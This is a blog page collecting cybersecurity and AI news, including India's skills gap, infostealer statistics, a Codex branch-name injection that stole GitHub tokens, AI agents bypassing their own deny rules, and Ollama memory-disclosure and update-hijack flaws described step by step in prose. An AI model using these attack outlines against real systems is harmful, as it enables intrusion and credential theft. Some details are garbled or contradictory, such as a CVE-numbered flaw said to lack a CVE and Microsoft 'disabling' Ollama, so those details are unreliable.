Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

India’s Cybersecurity Workforce Struggles to Keep Pace as AI and Cloud Systems Expand

 



India’s fast-growing digital economy is creating an urgent demand for cybersecurity professionals, but companies across the country are finding it increasingly difficult to hire people with the technical expertise required to secure modern systems.

A new study released by the Data Security Council of India and SANS Institute found that businesses are facing a serious shortage of skilled cybersecurity workers as technologies such as artificial intelligence, cloud computing, and API-driven infrastructure become more deeply integrated into daily operations.

According to the Indian Cyber Security Skilling Landscape Report 2025–26, nearly 73 per cent of enterprises and 68 per cent of service providers said there is a limited supply of qualified cybersecurity professionals in the country. The report suggests that organisations are struggling to build teams capable of handling increasingly advanced cyber risks at a time when companies are rapidly digitising services, storing more information online, and adopting AI-powered tools.

The hiring process itself is also becoming slower. Around 84 per cent of organisations surveyed said cybersecurity positions often remain vacant for one to six months before suitable candidates are found. This delay reflects a growing mismatch between industry expectations and the skills available in the job market.

Researchers noted that many applicants entering the cybersecurity workforce lack practical exposure to real-world security environments. Around 63 per cent of enterprises and 59 per cent of service providers said candidates often do not possess sufficient hands-on technical experience. Employers are no longer only looking for basic security knowledge. Companies increasingly require professionals who understand multiple areas at once, including cloud infrastructure, application security, digital identity systems, and access management technologies. Nearly 58 per cent of enterprises and 60 per cent of providers admitted they are struggling to find candidates with this type of cross-functional expertise.

The report connects this shortage to the changing structure of enterprise technology systems. Many organisations are moving away from traditional on-premise setups and shifting toward cloud-native environments, interconnected APIs, and AI-supported operations. As businesses automate more routine tasks, demand is gradually moving away from entry-level operational positions and toward specialised cybersecurity roles that require analytical thinking, threat detection capabilities, and advanced technical decision-making.

Artificial intelligence is now becoming one of the largest drivers of cybersecurity hiring demand. Around 83 per cent of organisations surveyed described AI and generative AI security skills as essential for future operations, while 78 per cent reported strong demand for AI security engineers. The findings also show that nearly 62 per cent of enterprises are already running active AI or generative AI projects, which experts say can create additional security risks if systems are not properly monitored and protected.

As companies deploy AI systems, the attack surface for cybercriminals also expands. Security teams are now expected to defend AI models, protect sensitive datasets, monitor automated systems for manipulation, and secure APIs connecting multiple digital services. Industry experts have repeatedly warned that many organisations are adopting AI tools faster than they are building security frameworks around them.

Some cybersecurity positions remain especially difficult to fill. The report found that almost half of service providers and nearly 40 per cent of enterprises are struggling to recruit security architects, professionals responsible for designing secure digital infrastructure and long-term defence strategies. Demand is also increasing for specialists in operational technology and industrial control system security, commonly known as OT/ICS security. These professionals help protect critical infrastructure such as manufacturing facilities, power systems, transportation networks, and industrial operations from cyberattacks.

At the same time, companies are facing growing retention problems. Around 70 per cent of service providers and 42 per cent of enterprises said employees are frequently leaving for competitors offering better salaries and career opportunities. Limited access to advanced training and upskilling programs is also contributing to workforce attrition across the sector.

The findings point to a larger issue facing the cybersecurity industry globally: technology is evolving faster than workforce development. Experts believe companies, educational institutions, and training organisations may need to work more closely together to create industry-focused learning pathways that prepare professionals for modern cyber threats instead of relying heavily on theoretical instruction alone.

With India continuing to expand digital public infrastructure, cloud adoption, fintech services, AI development, and connected industrial systems, cybersecurity professionals are expected to play a central role in protecting sensitive information, maintaining operational stability, and preserving trust in digital platforms.

AI Polling Reshapes Political Research as Firms Turn Conversations Into Data

 

Artificial intelligence is rapidly transforming the world of political opinion polling, replacing time-consuming human-led interviews with automated conversational systems capable of analysing public sentiment at scale.

"When you hear the word 'politician', what is the first image or emotion that comes to mind?"

The question is asked not by a human researcher, but by an AI-powered voice assistant. While a respondent shares his views over the phone, multiple AI systems simultaneously analyse the conversation. One verifies whether the person is answering the question correctly, another evaluates the depth of the response, while a third checks for possible fraud or bot-like behaviour.

The technology is being developed by Naratis, a French start-up focused on bringing artificial intelligence into political opinion research.

"The US has start-ups like Outset, Listen Labs and Hey Marvin that do AI polling like this in the commercial sphere. To my knowledge we're the first to do this for political opinion polling as well," says Pierre Fontaine, the 28-year-old engineer who founded the firm in 2025.

The emergence of AI-led polling marks a major shift for an industry traditionally dependent on manual interviews and extensive human analysis. In countries such as France, polling firms are increasingly exploring automation to reduce costs and speed up research processes.

Naratis specifically targets qualitative research, which is widely regarded as the most expensive and labour-intensive form of polling. Traditionally, these studies involve one-on-one interviews or focus groups that can take weeks to organise and analyse. By using conversational AI, the company says it can significantly reduce both time and cost.

Rather than relying on standard multiple-choice surveys, the platform encourages participants to engage in conversations with AI systems. "We don't ask people to tick boxes - they have a conversation with an AI," Fontaine explains. "That means we can explore not just what people think, but how they think - how they build their opinions, and even when those opinions change."

The company claims its approach is "10 times faster, 10 times cheaper and 90% as accurate as human polling".

According to the firm, projects that previously required weeks and substantial budgets can now be completed within a couple of days, with some responses collected in less than 24 hours. Fontaine describes this advantage as "parallelisation", where numerous AI agents conduct interviews simultaneously instead of relying on individual human researchers.

The rise of AI polling comes at a challenging time for the polling industry overall. Survey participation rates have dropped sharply over the decades, increasing operational costs and raising concerns about the reliability and representativeness of public opinion studies.

Supporters of AI polling argue that conversational systems may encourage respondents to be more honest, especially when discussing politically sensitive issues. Some researchers believe this could reduce social desirability bias, where people avoid expressing controversial opinions to human interviewers.

However, critics remain cautious about the growing dependence on AI in political research. Concerns include the possibility of AI systems generating inaccurate conclusions, producing overly generic responses, or creating misleading synthetic data.

Questions have also emerged around the use of "digital twins" and "synthetic people" — AI-generated profiles designed to imitate real human behaviour. While some market research firms use such tools for testing and simulations, many organisations remain reluctant to apply them in political polling.

At Ipsos, AI is already used extensively in consumer and behavioural research, including analysing user-recorded videos and studying social media activity. However, major firms continue to maintain human oversight in politically sensitive projects.

At OpinionWay, AI may assist with conducting interviews, but "we would never publish an opinion poll based on AI-generated data," says CEO of OpinionWay Bruno Jeanbart, citing concerns about trust.

Experts believe the future of polling will likely involve a hybrid approach combining AI efficiency with human supervision. While automation can accelerate research and lower costs, human researchers are still considered essential for validating findings, interpreting nuance and ensuring accountability.

Even AI advocates acknowledge the need for caution. "The goal is end-to-end automation, but today it would be unsafe and socially unacceptable to remove humans entirely," says Le Brun.

As economic pressures continue to push the polling industry toward faster and cheaper methods, companies like Naratis are betting that AI-driven conversations could redefine how public opinion is collected and understood. Whether this transformation strengthens trust in polling or deepens public scepticism may ultimately depend on how responsibly the technology is implemented and regulated.

Ransomware Attacks Reach All Time High, Leaked Over 2.6 Billion Records

 

A recent analysis of cybercrime data of last year (2025) disclosed that ransomware victims have risen rapidly by 45% in the previous year. But this is not important, as there exists something more dangerous. The passive dependence on hacked credentials as the primary entry point tactic is the main concern. Regardless of the platforms used, the accounts you are trying to protect, it is high time users start paying attention to password security. 

State of Cybercrime report 2026


The report from KELA found over 2.86 billion hacked credentials, passwords, session cookies, and other info that allows 2FA authentication. Surprisingly, authentication services and business cloud accounted for over 30% of the leaked data in 2025.

The analysis also revealed that infostealer malware which compromised credentials is immune to whatever OS you are using, “infections on macOS devices increased from fewer than 1,000 cases in 2024 to more than 70,000 in 2025, a 7,000% increase,” the report said.

Expert advice


Experts from Forbes have warned users about the risks associated with infostealer malware endless times. The leaked data includes FBI operations aimed at shutting down cybercrime gangs, millions of gmail passwords within leaked infostealer logs, and much more. Despite the KELA analysis, the risk continues. To make things worse, the damage is increasing year after year.

About infostealer


Kela defined the malware as something that is “designed to exfiltrate sensitive data from compromised machines, including login credentials, authentication tokens, and other critical account information.” What is more troublesome is the ubiquity of malware-as-a-service campaigns in the dark web world. The entry barrier is not closed, but the gates have been kicked wide open for experts as well as amateur threat actors. Data compromise in billions

Infostealer malware, according to Kela, ‘is designed to exfiltrate sensitive data from compromised machines, including login credentials, authentication tokens, and other critical account information.” And with the now almost universal availability of malware-as-a-service operations to the infostealer criminal world, the barrier to entry has not only been lowered but kicked to the curb completely.

In 2025, Kela found around “3.9 million unique machines infected with infostealer malware globally, which collectively yielded 347.5 million compromised credentials.” The grand total amounts to 2.86 billion hacked credentials throughout all platforms: databases of infostealer logs and dark web criminal marketplaces.

Tricks used by infostealers:


AI-generated tailored scams, messaging apps, and email frequently use Phishing-as-a-Service to get around MFA. In so-called "hack your own password" assaults, users are duped into manually running scripts in order to circumvent conventional security measures.

Trojanized software is promoted by malicious advertisements and search results, increasing the risk of infection. In supply chain assaults, high-privilege credentials are the target of poisoned packages and DevTools impersonation. Form-grabbing and cookie theft are made possible via compromised browser extension updates. Fake software updates and pirated apps continued to be successful.

OpenAI Codex Bug Leads to GitHub Token Breach

 

In March 2026, researchers from BeyondTrust showed that a tailored GitHub branch name was enough to steal Codex’s OAuth token in cleartext. Tech giant OpenAI termed it as “Critical P1”. Soon after, Anthropic’s Claude Code source code leaked into the public npm registry, and Adversa’s Claude Code mutely ignored its own deny protocols once a prompt (command) exceeded over 50 subcommands.

Malicious codes in AI These codes were not isolated vulnerabilities. They were new in a nine-month campaign: six research teams revealed exploits against Copilot, Vertex AI, Codex, Claude Code. Every exploit followed the same strategy. An AI agent kept a credential, performed an action, and verified to a production system without any human session supporting the request.

The attack surface was first showcased at Balck Hat USA 2025, where experts hacked ChatGPT, Microsoft Copilot Studio, Gemini, Cursor and many more, on stage, with zero clicks. After nine, threat actors breached those same credentials.

How a branch name in Codex compromised GitHub


Researchers at BeyondTrust found Codex cloned repositories using a GitHub OAuth token attached in the git remote URL. While cloning, the branch name label allowed malicious data into the setup script. A backtick subshell and a semicolon changed the branch name into an extraction payload.

About the bug


The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. All reported issues have since been fixed in collaboration with OpenAI's security team.

This vulnerability allows an attacker to inject arbitrary commands through the GitHub branch name parameter, potentially leading to the theft of a victim's GitHub User Access Token—the same token Codex uses to authenticate with GitHub—through automated techniques. A victim's GitHub User Access Token, which Codex needs to authenticate with GitHub, may be stolen as a result.

Vulnerability impact


This vulnerability can scale to compromise numerous people interacting with a shared environment or GitHub repository using automated ways. The Codex CLI, Codex SDK, Codex IDE Extension, and the ChatGPT website are all impacted by the vulnerability. Since then, every issue that was reported has been fixed in collaboration with OpenAI's security team.

“OpenAI Codex is a cloud-based coding agent, accessible through ChatGPT. It allows users to point the tool toward a codebase and submit tasks through a prompt. Codex then spins up a managed container instance to execute these tasks—such as generating code, answering questions about a codebase, creating pull requests, and performing code reviews against the selected repository,” said Beyond Trust.

Spotify Verified Badge Targets AI Music Confusion as Human Artist Authentication Expands

 

Now appearing beside artist profiles, Spotify’s new “Verified by Spotify” badge uses a green checkmark to highlight real human creators. Only accounts meeting the platform’s internal authenticity checks receive the label. Rather than algorithm-built personas, these profiles represent actual musicians behind the music. The rollout is happening gradually, changing how artists appear in searches, playlists, and recommendations. 

The update arrives as concerns continue growing around AI-generated music flooding streaming services. Spotify says verification depends on signals such as active social media accounts, consistent listener activity, merchandise listings, and live performance schedules - indicators suggesting a genuine person is tied to the profile. 

According to the company, these measures are designed to separate human creators from automated content increasingly appearing online.  Spotify says most artists users actively search for will eventually receive verification. Artists recognized for meaningful contributions to music culture are expected to be prioritized ahead of bulk-uploaded or mass-generated accounts. 

Over the coming weeks, the checkmarks will gradually appear across the platform, with influence and authenticity carrying more weight than upload volume. The move comes as streaming platforms face mounting criticism over how they handle AI-generated tracks. While the badge confirms a profile belongs to a real person, some critics quickly pointed out that it does not indicate whether artificial intelligence was used to help create the music itself. 

Questions around what counts as “real” music continue growing as AI tools become more involved in production. Creator-rights advocate and former AI executive Ed Newton-Rex warned that systems like Spotify’s may unintentionally disadvantage independent musicians who do not tour, sell merchandise, or maintain strong social media visibility. 

Instead, he suggested platforms should directly label AI-generated songs rather than relying solely on artist verification. Experts also note that defining AI involvement in music is increasingly difficult. Professor Nick Collins from Durham University described AI-assisted music creation as a broad spectrum rather than a simple divide between human-made and machine-made work. Many songs now involve software-assisted mixing, mastering, composition, or editing, making it far harder to classify music by origin alone. 

Spotify has faced years of criticism over AI-generated audio. Across forums and online communities, users have repeatedly called for clearer labels showing whether tracks were created by humans or algorithms. Some developers have even built independent tools aimed at detecting and filtering AI-generated songs on the platform. Concerns intensified after projects like The Velvet Sundown attracted large audiences despite having no interviews, live performances, or publicly traceable history. 

The group later described itself as a “synthetic music project” supported by artificial intelligence, fueling debate around transparency in digital music spaces. Spotify’s latest verification effort appears aimed at rebuilding trust while balancing support for evolving AI technologies. The move also reflects a broader trend across digital platforms, where companies are introducing verification systems to distinguish human-created content from synthetic material as AI-generated media becomes harder to identify.

Friendly AI Chatbots More Likely to Give Wrong Answers, Study Finds

 

Artificial intelligence chatbots that are designed to sound warm, friendly, and empathetic may be more likely to give wrong or misleading answers than their more neutral counterparts, according to a new study by researchers at the Oxford Internet Institute (OII). The findings raise concerns about how much users can trust AI assistants that have been deliberately tuned to feel more human‑like and emotionally supportive. 

What the study found 

The researchers analyzed over 400,000 responses from five major AI systems that had been modified to communicate in a more amiable, empathetic tone. They discovered that these “warm models” produced more factual errors than the original, less friendly versions, with error rates rising by an average of 7.43 percentage points across tasks. In some cases, the warm‑modeled chatbots not only gave incorrect information but also reaffirmed users’ mistaken beliefs, particularly when expressing emotion.

The OII team describes this as a “warmth‑accuracy trade‑off”: the more the models are optimized to be agreeable and supportive, the more their reliability drops. Lead author Lujain Ibrahim told the BBC that, like humans, AI can struggle to deliver honest but uncomfortable truths when its main goal becomes being likable rather than being accurate. This mimics a human tendency to soften harsh feedback to avoid conflict, but in an AI context it can mean dangerous misinformation, especially on topics like health or legal advice. 

 Risks for users

The risk is especially serious because people are increasingly using chatbots for emotional support, mental‑health guidance, or even medical and financial advice. If a friendly AI constantly agrees with users or gives reassuring but false answers, it can reinforce harmful misconceptions instead of correcting them. The study notes that such “warm” tuning can create vulnerabilities that do not exist in the original, less sociable models, making it crucial for users and developers to treat these systems as fallible tools rather than infallible experts. 

The paper urges developers to rethink how they fine‑tune chatbots for companionship or counseling, emphasizing the need to balance empathy with factual rigor. Some industry leaders have already warned against “blindly trusting” AI outputs, and many platforms now include prominent disclaimers about potential inaccuracies. However, the OII research suggests that simply making an AI sound more friendly can quietly increase those risks, meaning future design choices must explicitly prioritize truthfulness over artificial charm.

Why Europe Is Rethinking Its Dependence on US Cloud Providers




Concerns around digital sovereignty are rapidly becoming one of the most important debates shaping the future of cloud computing, artificial intelligence, and government technology infrastructure across Europe and the UK.

The discussion recently gained attention after Chi Onwurah, chair of the UK Science, Innovation and Technology Select Committee, criticized Britain’s broader technology strategy and warned about growing dependence on a small group of major US technology companies. Her remarks pointed to reliance on providers such as Microsoft and Amazon Web Services, while also referencing Palantir Technologies because of its involvement in NHS and defence-related contracts. She also raised concerns about foreign-controlled technology supply chains supporting critical public infrastructure.

At the centre of the debate is the meaning of “digital sovereignty,” a term that is increasingly used by governments but often interpreted differently. In practical terms, sovereignty refers to a country maintaining legal authority and control over its citizens’ sensitive data, including where that information is processed, accessed, and governed. Experts argue that sovereign data should only fall under the jurisdiction of the nation to which it belongs, rather than being exposed to foreign legal systems or overseas regulatory reach.

The issue has become especially significant in the era of public cloud computing. Before large-scale cloud adoption, most government and enterprise data was stored and processed inside domestic datacentres, limiting both physical and remote access to national borders. While foreign software vendors occasionally required access for maintenance or support purposes, control over infrastructure largely remained local.

That model changed as governments and businesses increasingly adopted cloud services operated by US-headquartered providers. As organizations shifted toward subscription-based cloud platforms, concerns began emerging over whether sensitive national data could still be considered sovereign if it was processed through globally distributed infrastructure.

Much of the modern sovereignty debate intensified following the Schrems II ruling, a landmark European court decision that challenged how personal data could be transferred outside the EU to countries viewed as having weaker privacy protections. Since then, governments across Europe have pushed for tighter oversight of where data travels and who ultimately controls cloud infrastructure.

Although sovereignty concerns are often framed as a problem tied only to hyperscalers, industry analysts say the challenge is broader. Companies including IBM, Oracle Corporation, and Hewlett Packard Enterprise also face pressure to adapt their cloud and data processing models to meet stricter sovereignty expectations.

The debate has also been intensified by geopolitical tensions. European governments have become increasingly cautious about long-term dependence on foreign-owned digital infrastructure, particularly as cloud computing and artificial intelligence become more deeply connected to defence, healthcare, and public services. Analysts note that data infrastructure is now being viewed similarly to energy or telecommunications infrastructure: strategically important and politically sensitive.

Among the prominent providers, Microsoft was one of the earliest companies to experiment with sovereign cloud initiatives, including a dedicated German version of Microsoft 365. However, that model was eventually discontinued in 2022. Critics argue the company now faces greater difficulties adapting because many of its cloud services operate through highly interconnected global systems spread across more than 100 countries.

Questions around transparency have also created challenges. Reports previously indicated that Microsoft struggled to provide detailed information about certain data flows when requested by the Scottish Police Authority under data protection obligations. Investigative reporting from ProPublica also stated that US authorities encountered similar difficulties while attempting to evaluate Microsoft cloud services under FedRAMP certification requirements for government environments.

Additional scrutiny has emerged around Microsoft’s artificial intelligence infrastructure plans. The company had previously indicated that in-country AI processing capabilities for Copilot services in the UK would arrive by the end of 2025, though timelines have reportedly shifted into 2026. Some European customers are also expected to receive regional AI processing instead of fully sovereign national deployments.

Industry experts increasingly categorize sovereign cloud approaches into multiple levels. One common method involves creating “data boundaries,” where providers attempt to restrict where customer data is stored or processed while still operating under global cloud architectures. Critics argue this model may not fully satisfy stricter interpretations of sovereignty because some operational control can still remain overseas.

A second approach focuses on partnerships with local operators that manage sovereign services regionally. Amazon Web Services has promoted its European Sovereign Cloud initiative using this framework, arguing that the platform aligns with EU regulatory requirements. However, some analysts contend that EU-level governance is not the same as national sovereignty, particularly for non-EU countries such as the UK. Concerns have also been raised over whether US legislation, including the CLOUD Act, could still apply in certain circumstances.

Meanwhile, Google Cloud has attracted attention through its partnership with French defence and technology company Thales Group. Their joint venture, S3NS, is designed around France-specific sovereign infrastructure with air-gapped operations, meaning the systems can function independently without continuously communicating with external global networks for updates or validation checks.

Security specialists consider air-gapped architecture an important benchmark for sovereign cloud environments because it reduces reliance on foreign operational control. Google’s Distributed Cloud Air-Gapped platform is currently viewed by some analysts as one of the more mature sovereign cloud offerings available, despite still lacking some features present in its broader public cloud ecosystem.

The approach has already attracted major defence-related interest. France, NATO members, and the German military have all shown interest in sovereign infrastructure models, while the UK Ministry of Defence recently announced a £400 million contract spanning five years tied to these types of capabilities.

Competing alternatives are still evolving. AWS offers LocalStack-focused options largely aimed at development environments, while Microsoft’s disconnected Azure Local products have faced criticism from some analysts who argue the offerings remain less mature than competing sovereign platforms.

Despite rapid investment, experts say the sovereign cloud market is still in its early stages. Google’s France-based partnership model currently appears to offer one of the clearest examples of locally controlled hyperscale infrastructure, while AWS continues refining its European-focused model and Microsoft works through broader architectural and transparency challenges.

At the same time, the sovereignty movement may create new opportunities for regional cloud providers and domestic technology companies. However, analysts warn that building competitive sovereign infrastructure will require long-term investment, government support, and procurement strategies that allow interoperability between multiple vendors rather than locking public institutions into a single provider.

Many experts believe the future of sovereign technology infrastructure will likely depend on hybrid and partnership-driven models combining hyperscale cloud capabilities with locally managed operations. Supporters of the S3NS approach argue it offers an early blueprint for how global cloud providers and national operators could collaborate while still preserving local control over sensitive data and critical digital systems.

Remote Exploitation Risk Emerges From Ollama Out-of-Bounds Read Flaw


 

Increasing reliance on large language model infrastructure deployed locally has prompted a renewed focus on self-hosted artificial intelligence platforms' security posture after researchers revealed a critical vulnerability in Ollama that could lead to remote attackers gaining access to sensitive process memory without authorization. 

CVE-2026-7482, a security vulnerability with a CVSS severity score of 9,1 describes an out-of-bounds read vulnerability that can expose large portions of memory associated with running Ollama processes, including user prompts, system instructions, configuration data, and environment variables, as a result of an out-of-bounds read. Because Ollama is widely used as a local inference platform for open-source large language models such as Llama and Mistral, the disclosure has raised significant concerns among artificial intelligence and cybersecurity communities.

By using their own infrastructure rather than using external cloud providers, organizations and developers are able to run AI workloads directly. There are approximately 170,000 stars on GitHub, over 100 million Docker Hub downloads, and deployment footprints on nearly 300,000 servers accessible through the internet, which highlight the growing security risks associated with rapidly adopted artificial intelligence ecosystems as well as the sensitive operational data they process. 

Cyera has identified the vulnerability, dubbed Bleeding Llama, to originate from an insecure handling of GGUF model files within Ollama, in which the server implicitly trusts tensor dimension values embedded inside uploaded models without performing adequate boundary validations. Through this design weakness, an application can manipulate memory access operations during model processing by creating specially crafted GGUF files, forcing it to read data outside the application's intended memory buffers and incorporating fragments of sensitive runtime information into model artifacts generated by the application.

It is clear that the underlying problem is linked to the GPT-Generated Unified Format (GGUF), which is widely used to package and distribute large language models that can be efficiently executed locally. Similar to PyTorch's .pt and .pth models, safetensors, and ONNX models, GGUF enables developers to store and execute open-source models directly on local computers without the need for external resources. 

The vulnerability is identified as a result of the manner Ollama processes these files during model creation, specifically by using Go's unsafe package within a function known as WriteTo(). The implementation inadvertently exposes the heap to out-of-bounds reads when malicious tensor metadata is supplied because it relies on low-level memory operations that bypass standard language safety protections. 

It is possible to exploit this vulnerability by crafting a GGUF file with intentionally oversized tensor shape values and sending it to an exposed Ollama instance via the /api/create endpoint in an attack scenario. By manipulating dimensions, the application is forced to access memory regions outside the allocated boundaries during parsing and model generation. As a result, sensitive information contained within the Ollama process space is unintentionally disclosed. 

According to researchers, exposed memory may contain environment variables, authentication tokens, API credentials, system prompts, as well as portions of concurrent user interactions processed by the same instance. CVE-2026-7482 functions differently from conventional exploitation techniques, as it is a silent disclosure mechanism preventing data leakage without crashes, visible failures, or immediate forensic indicators, as opposed to conventional exploitation techniques. 

In internet-accessible deployments, the attack chain itself is considered relatively straightforward, significantly reducing the difficulty of remote exploitation. In order to manipulate Ollama into harvesting unintended memory regions during parsing and artifact generation, attackers can upload malicious GGUF models via the unauthenticated /api/create endpoint. These manipulated tensor dimensions then coerce Ollama into uploading the malicious model. 

An artifact containing sensitive process data can then be exported through the unauthenticated /api/push endpoint, allowing covert exfiltration of stolen information. According to security researchers, since many Ollama instances remain directly exposed to the Internet without adequate access restrictions, the vulnerability poses a particularly serious risk to enterprises and developers using local AI infrastructure assuming self-hosted deployments provide a higher degree of data isolation. 

Analysts warn that the “Bleeding Llama” vulnerability significantly increases the risks associated with self-hosted artificial intelligence infrastructure since unauthenticated attackers will have direct access to the active memory space of the Ollama process without the need for prior access or user involvement. 

In combination with the widespread adoption by enterprises and developers of the platform, the simplicity of exploitation transforms the issue from a single software defect into a large-scale exposure concern for organizations whose sensitive workloads rely on locally deployed language models. In contrast to conventional vulnerabilities causing service disruption, memory disclosure flaws of this nature are capable of silently compromising valuable operational and proprietary data for extended periods of time. 

A research study indicates that attackers could potentially extract confidential model weights, allowing for intellectual property theft or reconstruction of customized AI systems internally, as well as gathering sensitive prompts, business data, and user inputs processed by active models. 

In addition to infrastructure details and authentication tokens, exposed memory may reveal API credentials, runtime configuration information, and API credentials that could facilitate further network compromises. As well as the immediate technical risks, such incidents are also likely to adversely affect organizations increasingly integrating artificial intelligence systems into critical operations, especially those where privacy and local data control are important components of their deployments. 

Security teams across the industry have actively tracked this issue despite the absence of an official CVE identification number, which initially complicated the vulnerability disclosure process. According to defenders, organizations should prioritize rapid mitigation strategies, including immediately upgrading to patched Ollama releases once they are available, limiting public network exposure, implementing strict firewall and access control policies, and ensuring that the service operates under least privilege conditions to reduce access after a compromise has occurred. 

Further, security professionals recommend that network anomalies be monitored continuously, infrastructure audits for misconfigurations be conducted, and deployment within isolated or segmented networks in highly sensitive environments to reduce the attack surface of internet-accessible artificial intelligence systems. 

Furthermore, Striga researchers have identified two separate vulnerabilities that can be chained to result in persistent code execution within the Windows implementation of Ollama, compounding the disclosure surrounding "Bleeding Llama". Researchers have determined that the Windows desktop client is automatically launched during login through the Windows Startup folder and listens locally at 127.0.0.1:11434. 

After checking for updates from the /api/update endpoint periodically, the pending installers are executed the next time the application is started. It is characterized by a combination of a missing signature verification flaw - CVE-2026-42288 - and a path traversal vulnerability - CVE-2026-42249 - both of which have been assigned CVSS scores of 7.7.

According to researchers, the installer signatures are not validated before execution and staging paths are constructed directly from HTTP response headers without proper sanitization, enabling malicious files to be written to locations controlled by the attacker. The flaws may allow arbitrary executables to be silently deployed and executed during system login in scenarios in which an adversary could manipulate update responses, including redirecting the OLLAMA_UPDATE_URL configuration to a controlled HTTP server, while automatic updates remain enabled by default.

 The signature verification issue alone may allow temporary code to be executed from the staging directory, but when combined with a path traversal weakness, persistence can be achieved by writing payloads outside the expected update path, preventing subsequent legitimate updates from overwriting them. 

Ollama for Windows versions 0.12.10 through 0.17.5 are affected by this vulnerability and should be disabled automatically by Microsoft. Users are advised to remove Ollama shortcuts from the Windows Startup directory until patches can be made available. 

A broader security challenge is emerging across the rapidly evolving artificial intelligence ecosystem, which is being increasingly challenged by convenience-driven deployment models colliding with enterprise-grade security expectations as Ollama vulnerabilities develop in scope. 

In response to organizations' increasing adoption of self-hosted large language model infrastructure for the purposes of retaining greater control over sensitive data and inference workloads, researchers warn that insufficient hardening, exposed interfaces, and insecure update mechanisms can result in locally deployed AI environments becoming high-value attack targets. 

As a result of memory disclosure flaws, unauthenticated attack paths, and weaknesses within update workflows, AI infrastructure is becoming increasingly attractive to malicious actors looking to gain access to proprietary models, credentials, and operational intelligence, both opportunistic and sophisticated. 

Several security experts maintain that artificial intelligence platforms cannot be considered experimental development tools operating outside the traditional security governance framework, but rather need to be integrated into the same rigorous vulnerability management, network segmentation, monitoring, and software lifecycle practices that are used for critical enterprise systems.

Ransomware Victims Jump 45% in 2025 as Stolen Credentials Fuel Global Cybercrime Surge

 

A newly released cybercrime analysis has revealed a dramatic rise in ransomware activity during 2025, with the number of victims increasing by 45% compared to the previous year. However, cybersecurity experts say the bigger concern lies in the growing dependence on stolen credentials as the main entry point for cyberattacks.

According to the State of Cybercrime 2026 report published by KELA, researchers identified nearly 2.86 billion compromised credentials, including passwords and session cookies capable of bypassing two-factor authentication (2FA). More than 30% of the exposed data originated from business cloud platforms and authentication services throughout 2025.

The report also highlighted a sharp increase in malware infections targeting Apple users. “infections on macOS devices increased from fewer than 1,000 cases in 2024 to more than 70,000 in 2025, a 7,000% increase,” the report confirmed.

Cybersecurity researchers have repeatedly warned about the growing threat posed by infostealer malware. Despite multiple law enforcement crackdowns and investigations into cybercriminal groups operating stolen password databases, the threat landscape continues to worsen year after year.

KELA described infostealer malware as software “designed to exfiltrate sensitive data from compromised machines, including login credentials, authentication tokens, and other critical account information.” The report further noted that the rise of malware-as-a-service platforms has significantly lowered the barrier for cybercriminals, making these tools widely accessible.

Between January 1 and December 31, 2025, KELA stated that it “observed approximately 3.9 million unique machines infected with infostealer malware globally, which collectively yielded 347.5 million compromised credentials.” Across all monitored criminal marketplaces and leaked databases, the total number of compromised credentials tracked reached 2.86 billion.

The report identified several major attack methods commonly used by infostealer operators during 2025:
  • Email and messaging scams powered by AI-generated personalization, often bypassing MFA through Phishing-as-a-Service operations.
  • Social engineering tactics that trick users into manually running malicious scripts, known as “hack your own password” attacks.
  • Malicious advertisements and fake search engine results distributing trojanized software.
  • Supply chain attacks involving poisoned software packages and fake developer tools targeting privileged accounts.
  • Compromised browser extension updates enabling cookie theft and form-grabbing attacks.
  • Pirated applications and counterfeit software updates continuing to spread infections effectively.
Security experts recommend several preventive measures to reduce exposure to these attacks. Users are advised to keep operating systems and software updated only through official sources and avoid clicking links from unsolicited emails or messages, even if they appear legitimate.

Experts also stress the importance of using password managers to prevent password reuse across multiple accounts, limiting the damage caused by a single breach. Enabling two-factor authentication on all supported accounts remains essential, although attackers are increasingly using session-cookie theft to bypass MFA protections.

To strengthen account security further, cybersecurity professionals are encouraging users to adopt passkeys instead of traditional passwords wherever possible. Passkeys offer built-in phishing resistance, are randomly generated, and do not share private authentication keys during sign-ins, making them significantly harder for infostealer malware to compromise.

Purple Team Myth Exposed: Why It's Just Red vs Blue in 2026

 

Many organizations tout their "purple teams" as the pinnacle of cybersecurity collaboration, blending offensive red team tactics with defensive blue team strategies. However, a critical issue persists: these teams often remain siloed, functioning more like red and blue in disguise rather than a true integrated purple force. This misnomer stems from superficial exercises where attackers simulate breaches while defenders watch passively, failing to foster real-time learning or adaptive defenses. 

The problem intensifies in 2026's threat landscape, where exploit windows have shrunk dramatically to just 10 hours on average, demanding rapid response capabilities. Traditional purple teaming, limited to periodic workshops, cannot keep pace with agile adversaries exploiting zero-days and supply chain vulnerabilities. Without genuine fusion, red teams uncover flaws that blue teams log but rarely operationalize, leading to repeated failures during live incidents. This disconnect leaves enterprises exposed, as detections remain unrefined and defenses static. 

At its core, authentic purple teaming requires shared goals, continuous feedback loops, and joint ownership of outcomes, not just shared meeting rooms. Many setups falter here, with red teams prioritizing stealthy attacks over teachable moments and blue teams focusing on alerts without contextual adversary emulation. The result is a performative exercise that boosts resumes but not resilience, ignoring metrics like mean-time-to-respond or coverage of MITRE ATT&CK frameworks. 

To evolve, organizations must shift to autonomous, continuous purple teaming powered by AI agents that simulate attacks, investigate alerts, and map to real-world tactics. This approach validates detections in real-time, bridges the red-blue gap, and scales beyond human bandwidth. Forward-thinking teams are adopting adversarial exposure validation, ensuring defenses evolve proactively rather than reactively. Ultimately, ditching the purple label for hollow collaborations unlocks true synergy, fortifying organizations against 2026's relentless threats. By measuring success through integrated KPIs and embracing automation, security programs can transform from fragmented efforts into unified powerhouses.

Apricorn Launches 32TB Encrypted Drive to Strengthen Offline Data Security Against Cyber Threats

 

Security feels stronger when data is scrambled, yet that strength vanishes if login steps or secret codes fall into the wrong hands. Instead of relying on system files tucked inside computers - where sneaky programs like spyware or digital snoopers lurk - real protection means keeping those pieces far away from risk. Enter a fresh take from Apricorn: their updated Aegis Padlock DT FIPS line now includes a 32TB model built to lock out the host machine completely. 

This shift sidesteps common traps by handling safeguards directly on the drive itself. Authentication happens right on the device, using keys embedded into the drive's own interface. Rather than typing codes through the host machine, individuals enter their access number straight into the unit. Because of this setup, login details do not pass through the computer’s software layer, lowering risks tied to infected endpoints. 

According to Apricorn, cryptographic operations are managed entirely within the hardware via custom-built AegisWare code, ensuring private information stays separate from vulnerable environments. Isolated encrypted storage remains key for strong cyber defenses, says Apricorn's Kurt Markley. Not limited to online solutions, the device fits into wider efforts for securing data without connectivity. 

